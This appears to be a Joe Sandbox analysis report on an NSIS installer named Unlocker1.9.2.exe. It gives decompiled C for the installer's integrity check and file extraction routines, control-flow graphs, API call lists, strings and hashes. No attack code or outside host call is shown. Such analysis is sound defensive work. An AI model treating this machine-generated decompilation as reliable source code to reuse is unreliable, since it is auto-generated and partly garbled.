                                                                                                                                                              0x00403ef5
                                                                                                                                                              0x00403ef7
                                                                                                                                                              0x00403f06
                                                                                                                                                              0x00403f06
                                                                                                                                                              0x00403f08
                                                                                                                                                              0x00403f0d
                                                                                                                                                              0x00403f10
                                                                                                                                                              0x00403f12
                                                                                                                                                              0x00403f17
                                                                                                                                                              0x00403f20
                                                                                                                                                              0x00403f26
                                                                                                                                                              0x00403f32
                                                                                                                                                              0x00403f35
                                                                                                                                                              0x00403f3e
                                                                                                                                                              0x00403f43
                                                                                                                                                              0x00403f46
                                                                                                                                                              0x00403f4b
                                                                                                                                                              0x00403f62
                                                                                                                                                              0x00403f69
                                                                                                                                                              0x00403f7c
                                                                                                                                                              0x00403f7f
                                                                                                                                                              0x00403f94
                                                                                                                                                              0x00403f96
                                                                                                                                                              0x00403f9b
                                                                                                                                                              0x00403fa0
                                                                                                                                                              0x00403fa5
                                                                                                                                                              0x00403fa5
                                                                                                                                                              0x00403fb4
                                                                                                                                                              0x00403fc3
                                                                                                                                                              0x00403fc5
                                                                                                                                                              0x00403fdb
                                                                                                                                                              0x00403fea
                                                                                                                                                              0x00403fec
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • CheckDlgButton.USER32 ref: 00403F62
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403F76
                                                                                                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F94
                                                                                                                                                              • GetSysColor.USER32(?), ref: 00403FA5
                                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FB4
                                                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FC3
                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00403FCD
                                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FDB
                                                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FEA
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040404D
                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00404050
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040407B
                                                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040BB
                                                                                                                                                              • LoadCursorA.USER32 ref: 004040CA
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004040D3
                                                                                                                                                              • ShellExecuteA.SHELL32(0000070B,open, .B,00000000,00000000,00000001), ref: 004040E6
                                                                                                                                                              • LoadCursorA.USER32 ref: 004040F3
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004040F6
                                                                                                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404122
                                                                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404136
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                              • String ID: .B$N$Remove folder: $open$]t
                                                                                                                                                              • API String ID: 3615053054-215059723
                                                                                                                                                              • Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                                                                                              • Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
                                                                                                                                                              • Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                                                                                              • Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402C22 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 595 402c22-402c70 GetTickCount GetModuleFileNameA call 4056b4 598 402c72-402c77 595->598 599 402c7c-402caa call 4059dd call 405517 call 4059dd GetFileSize 595->599 600 402e54-402e58 598->600 607 402cb0 599->607 608 402d97-402da5 call 402bbe 599->608 610 402cb5-402ccc 607->610 614 402da7-402daa 608->614 615 402dfa-402dff 608->615 612 402cd0-402cd2 call 40304e 610->612 613 402cce 610->613 619 402cd7-402cd9 612->619 613->612 617 402dac-402dbd call 403080 call 40304e 614->617 618 402dce-402df8 GlobalAlloc call 403080 call 402e5b 614->618 615->600 635 402dc2-402dc4 617->635 618->615 642 402e0b-402e1c 618->642 621 402e01-402e09 call 402bbe 619->621 622 402cdf-402ce6 619->622 621->615 626 402d62-402d66 622->626 627 402ce8-402cfc call 405675 622->627 631 402d70-402d76 626->631 632 402d68-402d6f call 402bbe 626->632 627->631 646 402cfe-402d05 627->646 637 402d85-402d8f 631->637 638 402d78-402d82 call 405d6b 631->638 632->631 635->615 643 402dc6-402dcc 635->643 637->610 641 402d95 637->641 638->637 641->608 647 402e24-402e29 642->647 648 402e1e 642->648 643->615 643->618 646->631 650 402d07-402d0e 646->650 652 402e2a-402e30 647->652 648->647 650->631 651 402d10-402d17 650->651 651->631 653 402d19-402d20 651->653 652->652 654 402e32-402e4d SetFilePointer call 405675 652->654 653->631 655 402d22-402d42 653->655 658 402e52 654->658 655->615 657 402d48-402d4c 655->657 659 402d54-402d5c 657->659 660 402d4e-402d52 657->660 658->600 659->631 661 402d5e-402d60 659->661 660->641 660->659 661->631
                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                              			E00402C22(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe";
				 *0x423e8c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe", 0x400);
				_t89 = E004056B4(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\jones\\Desktop";
				E004059DD("C:\\Users\\jones\\Desktop", _t91);
				E004059DD(0x42b000, E00405517(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f028 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BBE(1);
					__eflags =  *0x423e94 - _t82; // 0xce00
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423e94; // 0xce00
						E00403080(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E5B(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423e90 = _t94;
							 *0x423e98 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423e9c =  *0x423e9c + 1;
								__eflags =  *0x423e9c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405675(0x423ea0, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403080( *0x40b018);
					_t65 = E0040304E( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423e94; // 0xce00
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040304E(0x417028, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BBE(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423e94;
						if( *0x423e94 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BBE(0);
							}
							goto L20;
						}
						E00405675( &_v44, 0x417028, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b018; // 0x10753b
						 *0x423f20 =  *0x423f20 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423e94 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40915c
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f028; // 0x10753f
						if(__eflags < 0) {
							_v12 = E00405D6B(_v12, 0x417028, _t90);
						}
						 *0x40b018 =  *0x40b018 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                                                                                                                              0x00402c2a
                                                                                                                                                              0x00402c2d
                                                                                                                                                              0x00402c30
                                                                                                                                                              0x00402c33
                                                                                                                                                              0x00402c39
                                                                                                                                                              0x00402c4a
                                                                                                                                                              0x00402c4f
                                                                                                                                                              0x00402c62
                                                                                                                                                              0x00402c67
                                                                                                                                                              0x00402c6a
                                                                                                                                                              0x00402c70
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402c72
                                                                                                                                                              0x00402c7d
                                                                                                                                                              0x00402c83
                                                                                                                                                              0x00402c94
                                                                                                                                                              0x00402c9b
                                                                                                                                                              0x00402ca1
                                                                                                                                                              0x00402ca3
                                                                                                                                                              0x00402ca8
                                                                                                                                                              0x00402caa
                                                                                                                                                              0x00402d97
                                                                                                                                                              0x00402d99
                                                                                                                                                              0x00402d9e
                                                                                                                                                              0x00402da5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402da7
                                                                                                                                                              0x00402daa
                                                                                                                                                              0x00402dce
                                                                                                                                                              0x00402dd3
                                                                                                                                                              0x00402dd9
                                                                                                                                                              0x00402ddb
                                                                                                                                                              0x00402de4
                                                                                                                                                              0x00402de9
                                                                                                                                                              0x00402dec
                                                                                                                                                              0x00402ded
                                                                                                                                                              0x00402dee
                                                                                                                                                              0x00402df0
                                                                                                                                                              0x00402df5
                                                                                                                                                              0x00402df8
                                                                                                                                                              0x00402e0b
                                                                                                                                                              0x00402e0f
                                                                                                                                                              0x00402e17
                                                                                                                                                              0x00402e1c
                                                                                                                                                              0x00402e1e
                                                                                                                                                              0x00402e1e
                                                                                                                                                              0x00402e1e
                                                                                                                                                              0x00402e26
                                                                                                                                                              0x00402e26
                                                                                                                                                              0x00402e29
                                                                                                                                                              0x00402e2a
                                                                                                                                                              0x00402e2a
                                                                                                                                                              0x00402e2d
                                                                                                                                                              0x00402e2f
                                                                                                                                                              0x00402e2f
                                                                                                                                                              0x00402e2f
                                                                                                                                                              0x00402e39
                                                                                                                                                              0x00402e3f
                                                                                                                                                              0x00402e4d
                                                                                                                                                              0x00402e52
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402e52
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402df8
                                                                                                                                                              0x00402db2
                                                                                                                                                              0x00402dbd
                                                                                                                                                              0x00402dc2
                                                                                                                                                              0x00402dc4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402dc9
                                                                                                                                                              0x00402dcc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402cb0
                                                                                                                                                              0x00402cb5
                                                                                                                                                              0x00402cb5
                                                                                                                                                              0x00402cba
                                                                                                                                                              0x00402cbe
                                                                                                                                                              0x00402cc5
                                                                                                                                                              0x00402cca
                                                                                                                                                              0x00402ccc
                                                                                                                                                              0x00402cce
                                                                                                                                                              0x00402cce
                                                                                                                                                              0x00402cd2
                                                                                                                                                              0x00402cd7
                                                                                                                                                              0x00402cd9
                                                                                                                                                              0x00402e03
                                                                                                                                                              0x00402dfa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402dfa
                                                                                                                                                              0x00402cdf
                                                                                                                                                              0x00402ce6
                                                                                                                                                              0x00402d62
                                                                                                                                                              0x00402d66
                                                                                                                                                              0x00402d6a
                                                                                                                                                              0x00402d6f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d66
                                                                                                                                                              0x00402cef
                                                                                                                                                              0x00402cf4
                                                                                                                                                              0x00402cf7
                                                                                                                                                              0x00402cfc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402cfe
                                                                                                                                                              0x00402d05
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d07
                                                                                                                                                              0x00402d0e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d10
                                                                                                                                                              0x00402d17
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d19
                                                                                                                                                              0x00402d20
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d22
                                                                                                                                                              0x00402d28
                                                                                                                                                              0x00402d31
                                                                                                                                                              0x00402d37
                                                                                                                                                              0x00402d3a
                                                                                                                                                              0x00402d3c
                                                                                                                                                              0x00402d42
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d48
                                                                                                                                                              0x00402d4c
                                                                                                                                                              0x00402d54
                                                                                                                                                              0x00402d54
                                                                                                                                                              0x00402d57
                                                                                                                                                              0x00402d57
                                                                                                                                                              0x00402d5a
                                                                                                                                                              0x00402d5c
                                                                                                                                                              0x00402d5e
                                                                                                                                                              0x00402d5e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d5c
                                                                                                                                                              0x00402d4e
                                                                                                                                                              0x00402d52
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d70
                                                                                                                                                              0x00402d70
                                                                                                                                                              0x00402d76
                                                                                                                                                              0x00402d82
                                                                                                                                                              0x00402d82
                                                                                                                                                              0x00402d85
                                                                                                                                                              0x00402d8b
                                                                                                                                                              0x00402d8d
                                                                                                                                                              0x00402d8d
                                                                                                                                                              0x00402d95
                                                                                                                                                              0x00402d95
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402d95

                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Unlocker1.9.2.exe,00000400), ref: 00402C4F
                                                                                                                                                                • Part of subcall function 004056B4: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 004056B8
                                                                                                                                                                • Part of subcall function 004056B4: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Unlocker1.9.2.exe,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 00402C9B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$(pA$-XF$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Unlocker1.9.2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                              • API String ID: 4283519449-2808966413
                                                                                                                                                              • Opcode ID: 8dd25270827e0f4bb7ccacab167cf8c400ed2e02d2919ad4f76227d9ce4bc1d1
                                                                                                                                                              • Instruction ID: bb8333a86194dcf573844375b596ab0c7c07cd824b72df89bd2f0bbec4532e5a
                                                                                                                                                              • Opcode Fuzzy Hash: 8dd25270827e0f4bb7ccacab167cf8c400ed2e02d2919ad4f76227d9ce4bc1d1
                                                                                                                                                              • Instruction Fuzzy Hash: 21511971A00214ABDB209F65DE89B9E7BB4EF04319F10403BF904B62D1D7BC9E458BAD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 792 401734-401757 call 4029f6 call 40553d 797 401761-401773 call 4059dd call 4054d0 lstrcatA 792->797 798 401759-40175f call 4059dd 792->798 803 401778-40177e call 405c3f 797->803 798->803 808 401783-401787 803->808 809 401789-401793 call 405cd8 808->809 810 4017ba-4017bd 808->810 817 4017a5-4017b7 809->817 818 401795-4017a3 CompareFileTime 809->818 812 4017c5-4017e1 call 4056b4 810->812 813 4017bf-4017c0 call 405695 810->813 820 4017e3-4017e6 812->820 821 401859-401882 call 404d7b call 402e5b 812->821 813->812 817->810 818->817 822 4017e8-40182a call 4059dd * 2 call 4059ff call 4059dd call 40529e 820->822 823 40183b-401845 call 404d7b 820->823 835 401884-401888 821->835 836 40188a-401896 SetFileTime 821->836 822->808 856 401830-401831 822->856 833 40184e-401854 823->833 837 402894 833->837 835->836 839 40189c-4018a7 FindCloseChangeNotification 835->839 836->839 840 402896-40289a 837->840 842 40288b-40288e 839->842 843 4018ad-4018b0 839->843 842->837 845 4018b2-4018c3 call 4059ff lstrcatA 843->845 846 4018c5-4018c8 call 4059ff 843->846 850 4018cd-402213 call 40529e 845->850 846->850 850->840 859 40265c-402663 850->859 856->833 858 401833-401834 856->858 858->823 859->842
                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040553D(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004054D0(E004059DD(0x409b50, "C:\\Program Files\\Unlocker")), ??);
				} else {
					_push(0x409b50);
					E004059DD();
				}
				E00405C3F(0x409b50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405CD8(0x409b50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405695(0x409b50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004056B4(0x409b50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404D7B(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f08;
						goto L32;
					} else {
						E004059DD(0x40a350, 0x424000);
						E004059DD(0x424000, 0x409b50);
						E004059FF(_t75, 0x40a350, 0x409b50, "C:\Users\jones\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E004059DD(0x424000, 0x40a350);
						_t62 = E0040529E("C:\Users\jones\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f08 =  &( *0x423f08->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b50);
								_push(0xfffffffa);
								E00404D7B();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D7B(0xffffffea,  *(_t85 - 8)); // executed
				 *0x423f34 =  *0x423f34 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E5B(); // executed
				 *0x423f34 =  *0x423f34 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffee);
					} else {
						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffe9);
						lstrcatA(0x409b50,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b50);
					E0040529E();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                                                              0x00401734
                                                                                                                                                              0x0040173b
                                                                                                                                                              0x00401744
                                                                                                                                                              0x00401747
                                                                                                                                                              0x0040174a
                                                                                                                                                              0x0040174f
                                                                                                                                                              0x00401757
                                                                                                                                                              0x00401773
                                                                                                                                                              0x00401759
                                                                                                                                                              0x00401759
                                                                                                                                                              0x0040175a
                                                                                                                                                              0x0040175a
                                                                                                                                                              0x00401779
                                                                                                                                                              0x00401783
                                                                                                                                                              0x00401783
                                                                                                                                                              0x00401787
                                                                                                                                                              0x0040178a
                                                                                                                                                              0x0040178f
                                                                                                                                                              0x00401791
                                                                                                                                                              0x00401793
                                                                                                                                                              0x00401798
                                                                                                                                                              0x00401798
                                                                                                                                                              0x004017a3
                                                                                                                                                              0x004017a3
                                                                                                                                                              0x004017b4
                                                                                                                                                              0x004017b6
                                                                                                                                                              0x004017b6
                                                                                                                                                              0x004017b7
                                                                                                                                                              0x004017b7
                                                                                                                                                              0x004017ba
                                                                                                                                                              0x004017bd
                                                                                                                                                              0x004017c0
                                                                                                                                                              0x004017c0
                                                                                                                                                              0x004017c7
                                                                                                                                                              0x004017d6
                                                                                                                                                              0x004017db
                                                                                                                                                              0x004017de
                                                                                                                                                              0x004017e1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004017e3
                                                                                                                                                              0x004017e6
                                                                                                                                                              0x00401840
                                                                                                                                                              0x00401845
                                                                                                                                                              0x004015a8
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040288b
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004017e8
                                                                                                                                                              0x004017ee
                                                                                                                                                              0x004017f9
                                                                                                                                                              0x00401806
                                                                                                                                                              0x00401811
                                                                                                                                                              0x00401827
                                                                                                                                                              0x00401827
                                                                                                                                                              0x0040182a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401830
                                                                                                                                                              0x00401830
                                                                                                                                                              0x00401831
                                                                                                                                                              0x0040184e
                                                                                                                                                              0x00402894
                                                                                                                                                              0x00402894
                                                                                                                                                              0x00402894
                                                                                                                                                              0x00401833
                                                                                                                                                              0x00401833
                                                                                                                                                              0x00401834
                                                                                                                                                              0x00401492
                                                                                                                                                              0x0040220e
                                                                                                                                                              0x0040220e
                                                                                                                                                              0x0040220e
                                                                                                                                                              0x00401831
                                                                                                                                                              0x0040182a
                                                                                                                                                              0x00402896
                                                                                                                                                              0x0040289a
                                                                                                                                                              0x0040289a
                                                                                                                                                              0x0040185e
                                                                                                                                                              0x00401863
                                                                                                                                                              0x00401869
                                                                                                                                                              0x0040186a
                                                                                                                                                              0x0040186b
                                                                                                                                                              0x0040186e
                                                                                                                                                              0x00401871
                                                                                                                                                              0x00401876
                                                                                                                                                              0x0040187c
                                                                                                                                                              0x00401880
                                                                                                                                                              0x00401882
                                                                                                                                                              0x0040188a
                                                                                                                                                              0x00401896
                                                                                                                                                              0x00401884
                                                                                                                                                              0x00401884
                                                                                                                                                              0x00401888
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401888
                                                                                                                                                              0x0040189f
                                                                                                                                                              0x004018a5
                                                                                                                                                              0x004018a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004018ad
